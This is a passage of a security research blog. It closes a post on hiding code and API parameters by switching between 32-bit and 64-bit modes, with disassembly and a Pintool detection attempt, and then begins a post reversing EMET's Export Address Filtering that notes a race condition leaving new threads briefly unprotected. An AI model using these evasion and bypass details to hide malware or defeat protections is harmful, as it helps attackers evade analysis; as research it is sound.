<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104D db 48h, 0CFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F ; ---------------------------------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F loc_40104F: ; DATA XREF: .text:00401049 o</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F pop eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401050 push offset aTestTest ; "test test"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401055 push 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401057 push eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401058 mov dword_403040, eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040105D call FileSeekWrite</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Totally messy and, as I mentioned before, a very effective way to hide the parameters of a function. Note that this kind of obfuscation is really powerful and, unlike standard packers, the clear code never appears ready to be dumped from memory. Also, you can use this idea to implement any other obfuscation technique. For example, you can easily create a little program that adds a lot of junk code all over the assembly listing. Also spreading the trick at the end of section 4, that is filling your source with pieces of code that can be interpreted in both 32bit and 64bit, will be very frustrating to whoever will have to analyse your program.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">6 - Evolutions</span></b></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This trick alone is very effective, but there are other good obfuscation techniques that have been used in various malwares/packers. Well, combine the old obfuscation techniques with this new one and you can obtain a code that is nearly impossible to analyze... well, not impossible but very very hard!</span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">7 - (Not) detecting the obfuscation</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I tried using Intel's Pin instrumentation toolkit (I used the 32bit version) to trace the test application I created, hoping that Pin would be able to identify and follow the far jumps that go from 32bit to 64bit. Unfortunately, Pin seems to be unable to handle these jumps as well (I also found people reporting this problem in the official Pin's forum). This is the source code of the Pintool I have written:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <stdio.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include "pin.H"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">namespace WINDOWS</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#include <windows.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">FILE * OutTrace;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ADDRINT ExceptionDispatcher = 0;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">bool LastJmp64 = false;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VOID DetectFarJmp(ADDRINT InstrEip, UINT32 Opcode) </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(LastJmp64)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "after jmp 64: eip %08x \n", InstrEip);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>LastJmp64 = false;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if( ((UINT8*)(InstrEip))[0] == 0xEA &&</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>((UINT8*)(InstrEip))[5] == 0x33 &&</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>((UINT8*)(InstrEip))[6] == 0)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Jump seg 64! eip %08x \n", InstrEip);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>LastJmp64 = true;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VOID Instruction(INS Ins, VOID *v)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectFarJmp, IARG_INST_PTR, IARG_UINT32, INS_Opcode(Ins), IARG_END);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VOID Fini(INT32 code, VOID *v)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Terminating execution\n");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fflush(OutTrace);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fclose(OutTrace);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">INT32 Usage()</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PIN_ERROR("Itrace pintool 1\n");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return -1;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">int main(int argc, char * argv[])</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>OutTrace = fopen("itrace.txt", "wb");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>WINDOWS::HMODULE hNtdll;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>hNtdll = WINDOWS::LoadLibrary("ntdll");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ExceptionDispatcher = (ADDRINT)WINDOWS::GetProcAddress(hNtdll, "KiUserExceptionDispatcher");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Exception handler address: %08x \n", ExceptionDispatcher);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>WINDOWS::FreeLibrary(hNtdll);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Initialize pin</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if (PIN_Init(argc, argv)) </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Usage();</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Register Instruction to be called to instrument instructions</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>INS_AddInstrumentFunction(Instruction, 0);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Register Fini to be called when the application exits</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PIN_AddFiniFunction(Fini, 0);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Start the program, never returns</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Starting Pintool\n"); </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PIN_StartProgram();</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return 0;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It simply identifies the opcode of a far jump, and if found, prints the address of the instruction that immediately follows it. Running the test produces the following log before making the application crash:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Exception handler address: 772f0124 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Starting Pintool</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 773010b2 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772ffb9a </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772ffa1a </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772ffa1a</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 01121022 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772f0124</span> </div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As we can see, the jumps within system DLLs are correctly detected and the problem occurs only at address 0x01121022, that is the first application's far jump. We notice this also because the following instruction is located at address 0x772f0124, which is the address of KiUserExceptionDispatcher (one of the functions called by Windows when an exception occurs).</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Moreover, the application works perfectly if run normally and crashes only when run under Pin. </span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I haven't investigated these details deeply, but it seems that something happens within Pin's </span><span style="font-family: Verdana, sans-serif;">instrumented code in case of the application far jumps, while Pin may have its own logic to handle Windows internal API calls.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">And there goes another tool...!</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As a note: you can use the 32bit version of Pin to instrument a 64bit process too (although Pin also exists in 64bit): the process will be running in 32bit mode, but the 64bit module is loaded and can be run without problems. So, I think it should be also possible, from a 64bit mode process, to call 32bit code, but I have not tried this yet.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">8 - Conclusion</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Legacy software and hardware are always a pain, and this is a good example of why they are. This obfuscation derives from the 32bit legacy in our new shiny 64bit CPUs, and it can present many advantages:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it hides computations mixing operations in 32bit and 64bit modes</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it hides parameters for API calls</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it hides API calls</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it destroys code and data cross references</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it makes analysis time consuming</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it can be only debugged via remote debugging</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it is difficult to have automated tools to solve this obfuscation</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">64bit support in analysis tools in general is not very good</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that when I say "hide" I mean that the code </span><span style="font-family: Verdana, sans-serif;">is difficult to visualize correctly in the disassembler or in usermode debuggers.</span><br />
<span style="font-family: Verdana, sans-serif;">The code is there however, but the current tools have difficulties in dealing with it.</span></div>
</div>
<div>
<br />
<div style="text-align: justify;">
<u style="font-family: Verdana, sans-serif;">Note:</u><span style="font-family: Verdana, sans-serif;"> I wrote this blog entry about two years ago and I proposed it for the Phrack magazine. At the end they decided to decline the offer just a few months ago and I decided to publish it now anyway. Some of the findings reported here were new at the time of writing, but were later published by other researchers (see the references). Also, even if I took some time to review this material again, some limitations I outlined to handle this obfuscation could have been fixed with newer software releases. Hope you enjoyed the article anyway :)</span></div>
<br /></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">9 - References</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[1]</b> Intel Manuals:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[2]</b> Windbg and Debugging tools for windows:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[3]</b> __emit:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/library/ms253948(v=vs.80).aspx</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[4]</b> Wow64:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/library/windows/desktop/aa384274(v=vs.85).aspx</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[5]</b> Pin:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Other articles on the subject:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[6]</b> Knockin' on Heaven's Gate Ð Dynamic Processor Mode Switching:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[7]</b> Call64, Bypassing Wow64 Emulation Layer:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://waleedassar.blogspot.it/2013/01/call64-no-wow64-emulation-layer.html</span></div>
</div>
</div>
<div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<br />
<div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;">
<div>
<div style="text-align: justify;">
<div style="margin: 0px;">
<span style="-webkit-text-stroke-width: 0px; color: black; font-family: Verdana, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><b>[8]</b><span style="font-family: Times New Roman;"> </span></span><span style="font-family: Verdana, sans-serif;">Ghost in the Shellcode 2014: Byte Sexual:</span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="text-align: justify;">
<div style="margin: 0px;">
<span style="text-align: start;"><span style="font-family: Verdana, sans-serif;">https://github.com/ctfs/write-ups/tree/master/ghost-in-the-shellcode-2014/byte-sexual</span></span></div>
</div>
</div>
</div>
</div>
<div>
<br /></div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com5tag:blogger.com,1999:blog-8573685359056491736.post-6652446804666793102014-03-20T16:37:00.001-07:002014-03-20T17:25:25.760-07:00Reversing EMET's EAF (and a couple of curious findings...)<span style="font-family: Verdana, sans-serif;"><a href="http://support.microsoft.com/kb/2458544">EMET</a> is a very useful tool that allows a user to configure the security protections against some common, well known, attack vectors. In this blog entry I will focus on EAF, pointing out some issues that affect the current implementation. EAF stands for Export Address Filtering and, as the name suggests, this protection controls the access to the Export Table of a couple of major system DLLs, in order to make it more difficult for an attacker to obtain the addresses of the APIs if the request is performed from outside executable modules (e.g. from a shellcode running from the stack, or from the heap).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here is a snapshot of the EMET configuration interface, where you can see all the available protections (including EAF):</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtXPZH08SMEbAdibj8DxsJuneV00XJ4HrCd16HGIpmYfijrmZWv71N6-uvJ552vG65Wt6OoL92ZxBLF2CCT0Jmiq-0_DaSdOwP82-__p2CNoawfJI6xooxPRLVUb1QDlwuh3VCikj9njE/s1600/emet_main.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtXPZH08SMEbAdibj8DxsJuneV00XJ4HrCd16HGIpmYfijrmZWv71N6-uvJ552vG65Wt6OoL92ZxBLF2CCT0Jmiq-0_DaSdOwP82-__p2CNoawfJI6xooxPRLVUb1QDlwuh3VCikj9njE/s640/emet_main.bmp" height="211" width="640" /></a></div>
<span style="font-family: Verdana, sans-serif;"></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">EMET uses the <a href="http://technet.microsoft.com/en-us/library/dd837644(v=ws.10).aspx">Shims engine</a> to inject its module inside all the protected processes: if you inspect a process (e.g. with Process Explorer) on which EMET is active, you will notice the presence of EMET.dll, which means that at least one protection is active for that process. So, EMET operates from the inside of the process in order to enable its protections, but, despite this "invasive" approach, I haven't noticed problems in performance or functionality. Some compatibility problems do exist (given the tricky nature of some protections), but they are well documented for all the most common software.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">Let's start focusing on EAF itself. First, EMET protects EMET.dll by calling the GetModuleHandleEx API: if as its parameters you specify the flags </span><span style="font-family: Verdana, sans-serif;">GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS and GET_MODULE_HANDLE_EX_FLAG_PIN, and an address inside the EMET.dll itself, as a result, the DLL will stay loaded </span><span style="font-family: Verdana, sans-serif;">until the process is terminated (no matter how many times FreeLibrary is called).</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">Then, EMET reads the Export Table of kernel32.dll and of ntdll.dll (the two DLLs being protected) and, in both cases, saves the AddressOfFunctions field (from the IMAGE_EXPORT_DIRECTORY structure) that contains </span><span style="font-family: Verdana, sans-serif;">the address at which all the exported APIs addresses are located. </span><span style="font-family: Verdana, sans-serif;">Having done that, EMET installs a global Exception Handler by calling the AddVectoredExceptionHandler API, which will be used to filter all the exceptions that occur </span><span style="font-family: Verdana, sans-serif;">when a hardware breakpoint is hit. I will describe this Exception Handler routine later.</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;">Now EMET proceeds in activating the protection by forking the execution into two threads.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">The main one uses the CreateToolhelp32Snapshot/Thread32First/Thread32Next </span><span style="font-family: Verdana, sans-serif;">APIs to get a list of all the running threads of the current process and saves them in an array:</span></span><br />
<br />
<span style="color: #222222; font-family: Courier New, Courier, monospace;">.text:0005486D push 0FFFFFFFFh ; dwMilliseconds</span><br />
<span style="color: #222222; font-family: 'Courier New', Courier, monospace;">.text:0005486F push array_mutex ; hHandle</span><span style="background-color: white; color: #222222; font-family: Courier New, Courier, monospace;"></span><br />
<span style="background-color: white; color: #222222; font-family: 'Courier New', Courier, monospace;">.text:00054875 call ds:WaitForSingleObject</span><br />
<span style="background-color: white; color: #222222; font-family: 'Courier New', Courier, monospace;">.text:0005487B mov eax, thread_count</span><br />
<div>
<div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054880 cmp eax, 256</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054885 jnb short loc_54897</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054887 mov ecx, [ebp+thread_id]</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:0005488A mov tid_array[eax*4], ecx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054891 inc thread_count</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The second one retrieves all the threads from the array and activates </span><span style="font-family: Verdana, sans-serif;">the hardware breakpoints on them in order to protect the AddressOfFunctions fields (one per DLL) mentioned above.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Such array has a hardcoded size of 256 DWORDS, but don't be disappointed: this is only a temporary buffer where the new threads are added until they are processed, and then removed, by </span><span style="font-family: Verdana, sans-serif;">the protector thread. </span><br />
<span style="font-family: Verdana, sans-serif;">Moreover, EMET uses a mutex (actually saved as the first element of the array) to synchronize the access to the thread list, thus ensuring that </span><span style="font-family: Verdana, sans-serif;">all the newly added threads are processed before the array fills up with 256 of them:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054906 Protector_Loop:</span></div>
<div style="background-color: white;">
<span style="color: magenta; font-family: Courier New, Courier, monospace;">.text:00054906 push 100</span></div>
<div style="background-color: white;">
<span style="color: magenta; font-family: Courier New, Courier, monospace;">.text:00054908 call ds:Sleep</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:0005490E push 0FFFFFFFFh</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054910 push array_mutex</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054916 call ds:WaitForSingleObject</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:0005491C mov ebx, thread_count</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054922 test ebx, ebx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054924 jz short loc_5498B</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div style="background-color: white; color: #222222;">
<br /></div>
</div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">Still, there is a curious race condition: there is a certain amount of time that </span><span style="font-family: Verdana, sans-serif;">passes between the creation of a thread, its insertion in the array and the activation of EAF in the protector thread. Due to this delay, new created threads </span><span style="font-family: Verdana, sans-serif;">(including the main application one) won't be protected by EAF in the initial time of their execution.</span></div>
<div>
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUva6AvQdMq2u8vMcX5InD7NLZOUEr5JTixAfRrstYWmCNyKXNmeHXeO67MEWcmeek7uxRKHAYauNNIpHSGrY71Ypzswz7EigTEFLLf4nqRVJQj5sd7yhP7s6-vmzgyby2saOjolX9h0Q/s1600/entry1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUva6AvQdMq2u8vMcX5InD7NLZOUEr5JTixAfRrstYWmCNyKXNmeHXeO67MEWcmeek7uxRKHAYauNNIpHSGrY71Ypzswz7EigTEFLLf4nqRVJQj5sd7yhP7s6-vmzgyby2saOjolX9h0Q/s1600/entry1.bmp" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
